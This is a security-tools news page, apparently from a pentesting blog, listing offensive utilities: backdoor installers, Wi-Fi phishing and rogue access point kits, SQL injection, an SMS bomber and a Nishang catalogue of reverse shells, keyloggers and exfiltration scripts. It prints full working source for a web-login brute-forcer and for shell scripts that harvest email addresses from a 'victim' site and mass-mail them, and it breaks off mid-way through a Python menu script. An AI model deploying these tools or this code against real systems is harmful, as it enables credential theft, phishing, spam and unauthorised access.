Channel: Penetration Test – Security List Network™

Hashcat gui for windows.


Updates BackdoorMe – a powerful auto-backdooring utility.


Latest Change 23/12/2015:
+ fixed travis version.
+ added poison module.
+ Fixed Bash and added a second bash backdoor.
+ removed offending tests.

Backdoorme is a simple utility that logs into a Linux machine and gives the user the option to install a slew of backdoors.

BackdoorMe, a powerful auto-backdooring utility. This backdoor has been tested on Kali Linux 2.0 and Ubuntu 14.04.


Currently enabled backdoors include:
+ Bash
+ Netcat
+ Netcat-traditional
+ Metasploit
+ Perl
+ Pupy
– Python: please run the dependencies Python script to install the necessary dependencies. Backdoorme requires Python 2.7 or higher.

Installation:

git clone https://github.com/Kkevsterrr/backdoorme <Your Clone Folder Name>
cd <your Folder>
python dependencies.py
python master.py


Update:
cd backdoorme
git pull

Source: https://github.com/Kkevsterrr | Our post Before

Updates wifiphiser – Fast automated phishing attacks against WPA networks.


Latest change 24/12/2015:
+ Introducing phishingpage module.
+ wifiphisher.py : Fix bug where the online template would not download.
+ phishingpage.py : Created the logoSnatcher.sh file and correctly inserted the ASCII art.

Wifiphisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase. It is a social engineering attack that, unlike other methods, does not involve any brute forcing. It is an easy way of obtaining WPA credentials.


From the victim’s perspective, the attack unfolds in three phases:
– Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point’s wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.
– Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point’s settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.
– Victim is served a realistic router-config-looking page. Wifiphisher employs a minimal web server that responds to HTTP and HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher responds with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade.
Requirements :
– Kali Linux.
– Two network interfaces, one wireless.
– A wireless card capable of injection.

USAGE

git clone https://github.com/sophron/wifiphisher
cd wifiphisher
python wifiphisher.py -h (for help)

update:
cd wifiphisher
git pull


Source : https://github.com/sophron/wifiphisher | Our Post before

JSQL Injection v0.73 – a java tool for automatic database injection.


Changelog v-0.73:
+ Authentication Basic Digest Negotiate NTLM and Kerberos.
+ Database type selection.
+ Remove Cookie (use Header instead).
+ Fix MySQL error based.
— Fix #1368
— Fix #223
— Fix #218
— Fix #138
— Fix #135
— Fix #133

jSQL Injection is a lightweight application used to find database information from a distant server.
jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).


jSQL is part of Kali Linux, the official successor to the BackTrack penetration testing distribution.
jSQL is also included in Black Hat Sec, ArchAssault Project and BlackArch Linux.

Disclaimer :
Attacking a web server is illegal without prior mutual consent. The end user is responsible for obeying all applicable laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Download : jsql-injection-alpha.v0.73.jar(2.82 MB)
Source : https://github.com/ron190
Our Post Before : http://seclist.us/jsql-injection-v-0-72-released-a-java-tool-for-automatic-database-injection.html

hydra – Penetration testing tool.


Hydra is a penetration testing tool exclusively focused on dictionary-attacking web-based login forms.
Latest change: Add retry queue.
Installation:
+ go get github.com/opennota/hydra
Usage: hydra -L logins.txt -P passwords.txt http://127.0.0.1/login "user=^USER^&pass=^PASS^" "login failed"

hydra.go script:

// This program is free software: you can redistribute it and/or modify it
// under the terms of the GNU General Public License as published by the Free
// Software Foundation, either version 3 of the License, or (at your option)
// any later version.
//
// This program is distributed in the hope that it will be useful, but
// WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
// Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program.  If not, see <http://www.gnu.org/licenses/>.

// Penetration testing tool.
package main

import (
	"bufio"
	"bytes"
	"errors"
	"flag"
	"fmt"
	"io"
	"io/ioutil"
	"log"
	"net/http"
	"net/http/cookiejar"
	"net/url"
	"os"
	"os/signal"
	"runtime"
	"strconv"
	"strings"
	"sync"
	"syscall"
)

const (
	defaultUserAgent   = "Mozilla/5.0 (Hydra)"
	defaultContentType = "application/x-www-form-urlencoded"
)

var (
	loginsStr          = flag.String("l", "", "A login or logins separated by colons")
	loginsFrom         = flag.String("L", "", "Load logins from FILE")
	passwordsStr       = flag.String("p", "", "A password or passwords separated by colons")
	passwordsFrom      = flag.String("P", "", "Load passwords from FILE")
	colonSeparatedFrom = flag.String("C", "", `Load lines in the colon separated "login:pass" format from FILE`)
	firstOnly          = flag.Bool("f", false, "Exit when a login/password pair is found")
	invertedCondition  = flag.Bool("i", false, "A fulfilled condition means an attempt was successful")
	numTasks           = flag.Int("t", 16, "A number of tasks to run in parallel")
	verbose            = flag.Bool("v", false, "Be verbose (show the response from the HTTP server)")
	showAttempts       = flag.Bool("V", false, "Show login+password for each attempt")
	outputTo           = flag.String("o", "", "Write found login/password pairs to FILE instead of stdout")
	headersAdd         Headers
	headersReplace     Headers

	retryQueueLength = flag.Int("r", 1024, "Length of the retry queue")

	postURL   string
	host      string
	data      string
	condition []byte

	jobs  chan Job
	retry chan Job
	wg    sync.WaitGroup

	m   sync.Mutex
	out io.WriteCloser = os.Stdout

	proxyURL *url.URL
)

type Header struct {
	key   string
	value string
}

type Headers []Header

func (hs *Headers) Set(val string) error {
	if !strings.Contains(val, ":") {
		return errors.New("invalid header: " + val)
	}

	kv := strings.SplitN(val, ":", 2)
	h := Header{
		key:   kv[0],
		value: strings.TrimLeft(kv[1], " "),
	}
	*hs = append(*hs, h)

	return nil
}

func (hs *Headers) String() string {
	s := make([]string, 0, len(*hs))
	for _, h := range *hs {
		s = append(s, fmt.Sprintf("%s: %s", h.key, h.value))
	}
	return strings.Join(s, "\n")
}

type Job struct {
	user string
	pass string
}

func readlines(fn string) (lines []string) {
	f, err := os.Open(fn)
	if err != nil {
		log.Fatal(err)
	}
	defer f.Close()

	scanner := bufio.NewScanner(f)
	for scanner.Scan() {
		lines = append(lines, scanner.Text())
	}
	if err := scanner.Err(); err != nil {
		log.Fatal(err)
	}

	return
}

func safeExit() {
	m.Lock()
	err := out.Close()
	m.Unlock()
	if err != nil {
		log.Print(err)
	}

	os.Exit(0)
}

func worker(n int) {
	defer wg.Done()

	client := http.Client{}
	if proxyURL != nil {
		client.Transport = &http.Transport{
			Proxy: http.ProxyURL(proxyURL),
		}
	}

	var job Job
	ok := true
loop:
	for {
		if ok {
			// Block until a job arrives or the jobs channel is closed. A non-blocking
			// receive with a default case would let a worker exit before main has
			// queued anything, since the workers are started before the jobs are sent.
			select {
			case job, ok = <-jobs:
				if !ok {
					continue loop
				}
			case job = <-retry:
			}
		} else {
			select {
			case job = <-retry:
			default:
				break loop
			}
		}

		if *showAttempts {
			fmt.Fprintf(os.Stderr, "[ATTEMPT] target %s - login %q - pass %q [worker %d]\n", host, job.user, job.pass, n)
		}

		postData := strings.Replace(data, "^USER^", url.QueryEscape(job.user), -1)
		postData = strings.Replace(postData, "^PASS^", url.QueryEscape(job.pass), -1)
		req, _ := http.NewRequest("POST", postURL, strings.NewReader(postData))

		req.Header.Add("Host", host)
		req.Header.Add("User-Agent", defaultUserAgent)
		req.Header.Add("Content-Length", strconv.Itoa(len(postData)))
		req.Header.Add("Content-Type", defaultContentType)
		req.Header.Add("Connection", "Keep-Alive")

		for _, h := range headersAdd {
			req.Header.Add(h.key, h.value)
		}
		for _, h := range headersReplace {
			req.Header.Set(h.key, h.value)
		}

		client.Jar, _ = cookiejar.New(nil)

		resp, err := client.Do(req)
		if err != nil {
			log.Print(err)
			select {
			case retry <- job:
			default:
			}
			continue
		}

		if *verbose {
			resp.Header.Write(os.Stderr)
			os.Stderr.Write([]byte{'\n'})
		}

		body, err := ioutil.ReadAll(resp.Body)
		resp.Body.Close()
		if err != nil {
			log.Print(err)
			select {
			case retry <- job:
			default:
			}
			continue
		}

		if *verbose {
			os.Stderr.Write(body)
		}

		failed := bytes.Contains(body, condition)
		if *invertedCondition {
			failed = !failed
		}
		if failed {
			continue
		}

		m.Lock()
		_, err = fmt.Fprintf(out, "%s:%s\n", job.user, job.pass)
		m.Unlock()
		if err != nil {
			log.Print(err)
		}

		if *firstOnly {
			safeExit()
		}
	}
}

func main() {
	runtime.GOMAXPROCS(runtime.NumCPU())

	log.SetFlags(log.Lshortfile)

	flag.Usage = func() {
		fmt.Fprintf(os.Stderr, `Usage: hydra [options] URL post-data condition
Options:
  -l login   A login or logins separated by colons
  -L FILE    Load logins from FILE
  -p pass    A password or passwords separated by colons
  -P FILE    Load passwords from FILE
  -C FILE    Load lines in the colon separated "login:pass" format from FILE
  -h header  Add an HTTP header
  -H header  Replace an HTTP header
  -i         A fulfilled condition means an attempt was successful
  -f         Exit when a login/password pair is found
  -t TASKS   A number of tasks to run in parallel (default: 16)
  -o FILE    Write found login/password pairs to FILE instead of stdout
  -v         Be verbose (show the response from the HTTP server)
  -V         Show login+password for each attempt
  -r         Length of the retry queue (default: 1024)
Use HYDRA_PROXY environment variable for proxy setup.
`)
	}

	flag.Var(&headersAdd, "h", "Add an HTTP header")
	flag.Var(&headersReplace, "H", "Replace an HTTP header")
	flag.Parse()
	if len(flag.Args()) != 3 {
		flag.Usage()
		os.Exit(1)
	}

	if *loginsStr != "" && *loginsFrom != "" {
		log.Fatal("both -l and -L are specified")
	}

	if *passwordsStr != "" && *passwordsFrom != "" {
		log.Fatal("both -p and -P are specified")
	}

	if *colonSeparatedFrom != "" &&
		(*loginsStr != "" ||
			*loginsFrom != "" ||
			*passwordsStr != "" ||
			*passwordsFrom != "") {
		log.Fatal("both -C and one of -l/-L/-p/-P are specified")
	}

	if *colonSeparatedFrom == "" {
		if *loginsStr == "" && *loginsFrom == "" {
			log.Fatal("no logins are specified")
		}
		if *passwordsStr == "" && *passwordsFrom == "" {
			log.Fatal("no passwords are specified")
		}
	}

	postURL = flag.Arg(0)
	parsed, err := url.Parse(postURL)
	if err != nil {
		log.Fatal("invalid URL: " + err.Error())
	}

	host = parsed.Host
	data = flag.Arg(1)
	condition = []byte(flag.Arg(2))

	proxy := os.Getenv("HYDRA_PROXY")
	if proxy != "" {
		proxyURL, err = url.Parse(proxy)
		if err != nil {
			log.Fatal("invalid proxy URL: " + err.Error())
		}
	}

	retry = make(chan Job, *retryQueueLength)
	jobs = make(chan Job, *numTasks)
	wg.Add(*numTasks)
	for i := 0; i < *numTasks; i++ {
		go worker(i)
	}

	if *outputTo != "" {
		out, err = os.OpenFile(*outputTo, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0600)
		if err != nil {
			log.Fatal(err)
		}
		defer out.Close()

		sig := make(chan os.Signal, 1) // buffered, so a signal arriving before the receive is not dropped
		signal.Notify(sig, os.Interrupt)
		signal.Notify(sig, syscall.SIGTERM)

		go func() {
			<-sig
			safeExit()
		}()
	}

	if *colonSeparatedFrom != "" {
		f, err := os.Open(*colonSeparatedFrom)
		if err != nil {
			log.Fatal(err)
		}
		defer f.Close()

		scanner := bufio.NewScanner(f)
		for scanner.Scan() {
			lp := strings.SplitN(scanner.Text(), ":", 2)
			if len(lp) < 2 {
				continue
			}

			jobs <- Job{lp[0], lp[1]}
		}
		if err := scanner.Err(); err != nil {
			log.Fatal(err)
		}
	} else {
		var logins, passwords []string

		if *loginsFrom != "" {
			logins = readlines(*loginsFrom)
		} else {
			logins = strings.Split(*loginsStr, ":")
		}

		if *passwordsFrom != "" {
			passwords = readlines(*passwordsFrom)
		} else {
			passwords = strings.Split(*passwordsStr, ":")
		}

		for _, pass := range passwords {
			for _, user := range logins {
				jobs <- Job{user, pass}
			}
		}
	}

	close(jobs)
	wg.Wait()
}

Source : https://github.com/opennota

Eharvester is a simple script which extracts email addresses from a given domain for the penetration testing process.


Eharvester is a simple script which extracts email addresses from a given domain for the penetration testing process.
The script works in two modes:
+ In the first mode you have to specify the sitemap of the website; this is fast. Just visit http://www.xml-sitemaps.com/ and make a sitemap of the victim website, download the text file urllist.txt and put it in the same directory as the script. The script then crawls the URLs from urllist.txt one by one and collects email addresses.
+ The second mode is automatic: just supply the domain name and it makes the sitemap and then gathers email addresses. But it is slow.


With the help of esender you can send social engineering emails to all addresses gathered by eharvester.

Usage of script :

git clone https://github.com/MacAwesome/ehs-supermaster
chmod +x harvester.sh
chmod +x esender.sh
./harvester.sh
./esender.sh

esender.sh script:

#!/usr/bin/env bash

echo "
 _____                              _           
| ____|          ___  ___ _ __   __| | ___ _ __ 
|  _|    _____  / __|/ _ \  _ \ / _  |/ _ \  __|
| |___  |_____| \__ \  __/ | | | (_| |  __/ |   
|_____|         |___/\___|_| |_|\__,_|\___|_|   
                                                
"

echo "
Enter your email address"
read -r address
echo "
Enter your password"
read -r -s password
echo "
Enter subject"
read -r subject
echo "
Enter message. If you want to send an HTML message, enter HTML code starting with <html>"
read -r msg

# output.txt is produced by harvester.sh and holds one address per line.
# The status message is printed once, before the loop; putting it inside the
# while condition would make the loop never terminate, since echo always succeeds.
echo "Messages are sending"
while read -r f1; do
    [ -z "$f1" ] && continue
    # sendEmail authenticates to Gmail's SMTP submission port with the sender's own credentials
    sendEmail -f "$address" -t "$f1" -u "$subject" -m "$msg" -s smtp.gmail.com:587 -xu "$address" -xp "$password"
done < output.txt

harvester.sh script:

#!/usr/bin/env bash

# E-Harvester is a simple script to harvest email addresses for penetration testing.
# The script works in two modes:
# 1. Create the sitemap manually (for example with http://www.xml-sitemaps.com/),
#    put the sitemap text file in the working directory of E-HARVESTER and name it urllist.txt.
# 2. Automatic: specify a domain name; the script first crawls the website and then
#    harvests email addresses. This is slow because of the crawling process.

echo "
 _____           _   _    _    ______     _______ ____ _____ _____ ____  
| ____|         | | | |  / \  |  _ \ \   / / ____/ ___|_   _| ____|  _ \ 
|  _|    _____  | |_| | / _ \ | |_) \ \ / /|  _| \___ \ | | |  _| | |_) |
| |___  |_____| |  _  |/ ___ \|  _ < \ V / | |___ ___) || | | |___|  _ < 
|_____|         |_| |_/_/   \_\_| \_\ \_/  |_____|____/ |_| |_____|_| \_\
                                                                         
"
echo "Please choose method"

echo "
1. If you have a sitemap of the website, name it urllist.txt & put it in the same directory (fast)
2. Generate the sitemap, then harvest emails (automatic but slow)
"
read -r m1

# Fetch every URL in urllist.txt, render it to text with w3m, pull out anything that
# looks like an email address and append the unique hits to output.txt.
# A temporary file holds each page's text instead of a file literally named "f1".
harvest() {
    local url page
    page=$(mktemp)
    while read -r url; do
        [ -z "$url" ] && continue
        w3m -dump "$url" > "$page"
        perl -wne 'while(/[\w\.]+@[\w\.]+/g){print "$&\n"}' "$page" | sort -u >> output.txt
    done < urllist.txt
    rm -f "$page"
    # deduplicate across pages as well
    sort -u -o output.txt output.txt
}

if [ "$m1" = "1" ]; then
echo "
Script is working, please be patient & give it some time to harvest.
"
harvest

cat output.txt
echo "
Harvesting is complete. Open the output.txt file to view the email addresses.
"
fi

if [ "$m1" = "2" ]; then
echo "
Please enter the website to harvest email addresses from.
For example http://tipstrickshack.blogspot.com
"
read -r choice
echo "
Now we have to make the urllist of the website, so be patient & give it some time.
"
# --spider does not store pages; the visited URLs are extracted from wget's log instead.
wget --spider --recursive --no-verbose --output-file=wgetlog.txt "$choice"
sed -n "s@.\+ URL:\([^ ]\+\) .\+@\1@p" wgetlog.txt | sed "s@&@\&amp;@" > urllist.txt
rm wgetlog.txt
harvest

cat output.txt
echo "
Harvesting is complete. Open the output.txt file to view the email addresses.
"
echo "
Use E-sender to send email to the harvested email addresses
"
fi

Source: https://github.com/MacAwesome

Arpy v3.15 – ARP MiTM Tool.


Arpy is an easy-to-use ARP spoofing MiTM tool for Mac. It provides 3 targeted functions:
+ Packet Sniffing
+ Visited Domains
+ Visited Domains with Gource


Tested OS (to date):
+ Darwin 14.3.0 Darwin Kernel Version 14.3.0 (Mac OS X)
+ Kali 2.0, Fedora and Ubuntu 14.04 LTS

Requirements:
– Python 2.7
– Gource
– Scapy

usage :

git clone https://github.com/ivanvza/arpy
cd arpy
sudo apt-get install gource (kali, Debian & Ubuntu)
yum install gource (for fedora)
pip install scapy

./arpy.py

source : https://github.com/ivanvza

WiFi-Pumpkin v0.71 released – Framework for Rogue Wi-Fi Access Point Attack.


Changelog v0.71:
+ added update commits from repository
+ added QTableWidget filter (mac,ip,hostname) clients connected on AP.
+ added count of clients connected on AP.
+ changed name Tool Wifi-Pumpkin
+ locked dnsmasq support temporarily


WiFi-Pumpkin is a security tool that provides a rogue access point for man-in-the-middle and network attacks: it purports to provide wireless Internet service while snooping on the traffic, and can be used to capture the credentials of unsuspecting users either by snooping on the communication or by phishing.
Features
+ Rogue Wi-Fi Access Point
+ Deauth Clients AP
+ Probe Request Monitor
+ DHCP Starvation Attack
+ Credentials Monitor
+ Windows Update Attack
+ Templates phishing
+ Partial bypass HSTS
+ Dump credentials phishing
+ Support airodump scan
+ Support mdk3 deauth
+ beef hook support
+ Report Logs html
+ Mac Changer
+ ARP Poison
+ DNS Spoof

Ubuntu/Kali 2.0/WifiSlax 4.11.1/Parrot 2.0.5:

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
cd WiFi-Pumpkin
chmod +x installer.sh
./installer.sh --install

then
wifipumpkin (ubuntu)
wifi-pumpkin (kali 2.0)

Source : https://github.com/P0cL4bs


Disrupt is a penetration tool devised purely for disruption purposes.


Disrupt is a penetration tool devised purely for disruption purposes.
Modules:
* SMS Bomber: The SMS Bomber module allows users to send an overflow of threads to victims’ phones. The threads are sent through Google’s mail servers using the smtplib module. It is recommended to send a thread size of 10-15 for faster delivery. A sending thread package can be any size. Also, in order to overflow a user, the victim needs to have an iPhone. It works with Android, but the recipient can block the sender.
* DoS Attack: Currently in Beta..


usage:

git clone https://github.com/ozylol/disrupt
cd disrupt
python disrupt.py

Source : https://github.com/ozylol

Trinity – Linux system call fuzzer.


Latest change v1.6-179-g6050c1c:
+ "add some extra sanity checks inside the child process" made trinity near unusable for me: the rec->tv sanity check fails rather quickly after the first syscall capable of changing wall time.
+ The patch reworks trinity to use clock_gettime(CLOCK_MONOTONIC) instead of gettimeofday(). It makes trinity usable again.

#######################################################################

WARNINGS:
* This program may seriously corrupt your files, including any of those that may be writable on mounted network file shares. It may create network packets that may cause disruption on your local network.

* Trinity may generate the right selection of syscalls to start sending random network packets to other hosts. While every effort is made to restrict this to IP addresses on local lans, multicast & broadcast, care should be taken to not allow the packets it generates to go out onto the internet.

Run at your own risk.
#######################################################################


System call fuzzers aren’t a particularly new idea. As far back as 1991, people have written apps that bomb syscall inputs with garbage data, with varying success in crashing assorted operating systems. After the obvious dumb bugs are fixed, however, the majority of these calls are simply rejected by the kernel very near the beginning of their function entry point, as basic parameter validation is performed. Trinity is a system call fuzzer which employs some techniques to pass semi-intelligent arguments to the syscalls being called.

The intelligence features include:
– If a system call expects a certain datatype as an argument (for example a file descriptor), it gets passed one.
This is the reason for the slow initial startup: trinity generates a list of fds for files it can read from /sys, /proc and /dev,
and then supplements this with fds for various network protocol sockets. (Information on which protocols succeed/fail is cached on the first run, greatly increasing the speed of subsequent runs.)
– If a system call only accepts certain values as an argument (for example a ‘flags’ field), trinity has a list of all the valid flags that may be passed.
Just to throw a spanner in the works, it will occasionally bitflip one of the flags, just to make things more interesting.
– If a system call only takes a range of values, the random value passed is biased to usually fit within that range.
Trinity logs its output to files (one for each child process), and fsyncs the files before it actually makes the system call. This way, should you trigger something which panics the kernel, you should be able to find out exactly what happened by examining the log.

There are several test harnesses provided (test-*.sh), which run trinity in various modes, take care of things like CPU affinity, and make sure it runs from the tmp directory. (Handy for cleaning up any garbage-named files; just rm -rf tmp afterwards.)

Usage:

git clone https://github.com/kernelslacker/trinity
cd trinity
./configure.sh
make
./trinity -h (for help)

Source: https://github.com/kernelslacker

sidedoor is a Backdoor using a reverse SSH tunnel.


sidedoor is a Backdoor using a reverse SSH tunnel on Debian/Ubuntu systems.
sidedoor maintains a reverse SSH tunnel to provide a backdoor. sidedoor can be used to remotely control a device behind a NAT. The sidedoor user has full root access configured in /etc/sudoers.d.

Howto:
1. Install sidedoor. For now, sudo dpkg -i sidedoor*.deb. You can build a package by running dpkg-buildpackage -us -uc -b.
2. Optionally, lock down the local SSH server by disabling password authentication (ChallengeResponseAuthentication no and PasswordAuthentication no) and listening only on localhost (ListenAddress ::1 and ListenAddress 127.0.0.1) in /etc/ssh/sshd_config. Then restart or reload sshd, e.g., sudo service ssh reload.
3. Configure REMOTE_SERVER and TUNNEL_PORT in /etc/default/sidedoor.
4. Install an SSH private key to access the remote server in /var/lib/sidedoor/.ssh/id_rsa. The corresponding public key will need to be included in the remote user’s ~/.ssh/authorized_keys file.
5. Install SSH public key(s) to control access to the local sidedoor user in /var/lib/sidedoor/.ssh/authorized_keys.
6. Restart sidedoor service, e.g., sudo service sidedoor restart.
7. Optionally, modify ssh_config_example and include it in a client’s ~/.ssh/config file to easily access the tunnelled backdoor.

Usage:

git clone https://github.com/daradib/sidedoor
cd sidedoor
./sidedoor

Source: https://github.com/daradib

Nishang v-0.6.2 – PowerShell for penetration testing and offensive security.


Changelog v0.6.2:
+ Added support for dumping cleartext credentials from RDP sessions to Invoke-MimikatzWdigestDowngrade.
– Fix issue #29.

DESCRIPTION
This script uses MJPEG to stream a target’s desktop in real time. It is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script when it is bound to a specific port.
A netcat listener which relays the connection to a local port can be used as the listener. A browser which supports MJPEG (Firefox) should then be pointed at the local port to see the remote desktop.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.


Scripts: Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak : Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster, FireListener : A pair of scripts for egress testing.
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys : Get WLAN keys in plain text from a target.
– Keylogger : Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade : Dump user passwords in plain text on Windows 8.1 and Server 2012.
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– Create-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote : Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay : Create network relays between computers.

+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
– Powerpreter : All the functionality of Nishang in a single script module.

+ Shells :
– Invoke-PsGcat : Send commands and scripts to a specified Gmail account to be executed by Invoke-PsGcatAgent.
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence : Remove persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip(951 KB) | Our Post Before
Source : http://www.labofapenetrationtester.com/

Updates ATSCAN – perl script for vulnerable Server, Site and dork scanner.


What’s new in 2016:
+ header changes.
+ Perl version
+ Script path
+ OS/Platform Version Print
+ and more usability..

ATSCAN is a Perl script with the following functions: dork scanner, XSS scanner, LFI scanner, filtering of WordPress and Joomla sites on a server, admin page finder, and MD5 / Base64 decode/encode.

Principal MENU:
1 = DORK SCANNER
2 = SITE SCANNER
3 = SERVER SCANNER
4 = MD5 / BASE 64
5 = ABOUT
6 = EXIT (->)

SCAN SITES OPTIONS:
[+] 1 = CHECK HTTPD VERSION
[+] 2 = XSS SCAN
[+] 3 = LFI SCAN
[+] 4 = RFI SCAN (JOOMLA)
[+] 5 = RFI SCAN (WORDPRESS)
[+] 6 = XSS + LFI
[+] 7 = FIND ADMIN PAGE
[+] 8 = BACK (<-)
[+] 9 = EXIT (->)

Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
perl atscan.pl

Update:
cd ATSCAN
git pull

Source : https://github.com/AlisamTechnology | Our Post Before

Breach-Miner ~ A quick and dirty tool to harvest credentials from leaked data dumps.


Breach-Miner is a quick and dirty Python-based tool to harvest credentials from a leaked data dump.
Just a handy tool for pentesters to recon their in-scope victims. With it you can identify whether a victim's email account has been leaked in any breach. The tool uses Troy Hunt's haveibeenpwned API to search for accounts in breach dumps.


Latest Change 1/1/2016:
+ Files/Resources : Create style.css
+ Update breachminer.py
+ Update cache_search.py
+ Update create_html.py
+ Update get_cache.js

Usage:

git clone https://github.com/secworld/Breach-Miner.git && cd Breach-Miner
chmod +x breachminer.py requirements.sh
./requirements.sh
python breachminer.py

Update:
cd Breach-Miner
git pull

Source : https://github.com/secworld

zizzania – automated DeAuth attack.


zizzania sniffs wireless traffic listening for WPA handshakes and dumping only those frames suitable to be decrypted (one beacon + EAPOL frames + data). In order to speed up the process, zizzania sends IEEE 802.11 DeAuth frames to the stations whose handshake is needed, properly handling retransmissions and reassociations and trying to limit the number of DeAuth frames sent to each station.


Dependencies:
+ SCons http://www.scons.org/
+ libpcap http://www.tcpdump.org/
+ uthash https://troydhanson.github.io/uthash/

Usage & Installation:

git clone https://github.com/cyrus-and/zizzania
cd zizzania

For Debian/Kali 2.0
sudo apt-get install scons libpcap-dev uthash-dev

Mac OSX
brew install scons libpcap clib
clib install troydhanson/uthash # from this directory

make
cd src
./zizzania

Source : https://github.com/cyrus-and


Penbox ~ Pentesting tools auto downloader Script.


Penbox ~ Pentesting tools auto downloader Script.
Requirements : python2.7

penbox v1.0 has been tested on Debian and Ubuntu 14.04 LTS

Operating System Support Menu:
1) Mac OSX
2) Linux
3) Windows

Main Menu:
1 : Information Gathering
2 : Password Attacks
3 : Wireless Testing
4 : Exploitation Tools
5 : Sniffing & Spoofing

penbox.py Script:

#!/usr/bin/env python2.7
#
#          All In One Tool For Penetration Testing 
#           Authors : Fedy Wesleti , Mohamed Nour 
#
import sys
import os
import subprocess
from commands import *
########################## 
#Variables
yes = set(['yes','y', 'ye', ''])
no = set(['no','n'])



##########################

#this is the big menu funtion 
def menu():
    print """
  ########  ######## ##    ## ########   #######  ##     ## 
  ##     ## ##       ###   ## ##     ## ##     ##  ##   ##  
  ##     ## ##       ####  ## ##     ## ##     ##   ## ##   
  ########  ######   ## ## ## ########  ##     ##    ###    
  ##        ##       ##  #### ##     ## ##     ##   ## ##   
  ##        ##       ##   ### ##     ## ##     ##  ##   ##  
  ##        ######## ##    ## ########   #######  ##     ##  v1.0  
                                  Pentesting Tools Auto-Downloader 
 
  [+]       Coded BY Mohamed Nour & Fedy Weslety        [+] 
  [+]          FB/CEH.TN    ~~   FB/mohamed.zeus.0      [+] 
  [+]             Greetz To All Pentesters              [+] 
Select from the menu:
1 : Information Gathering
2 : Password Attacks
3 : Wireless Testing
4 : Exploitation Tools
5 : Sniffing & Spoofing
99 : Exit
"""
    choice = int(raw_input("select a number :"))
    if choice == 1:
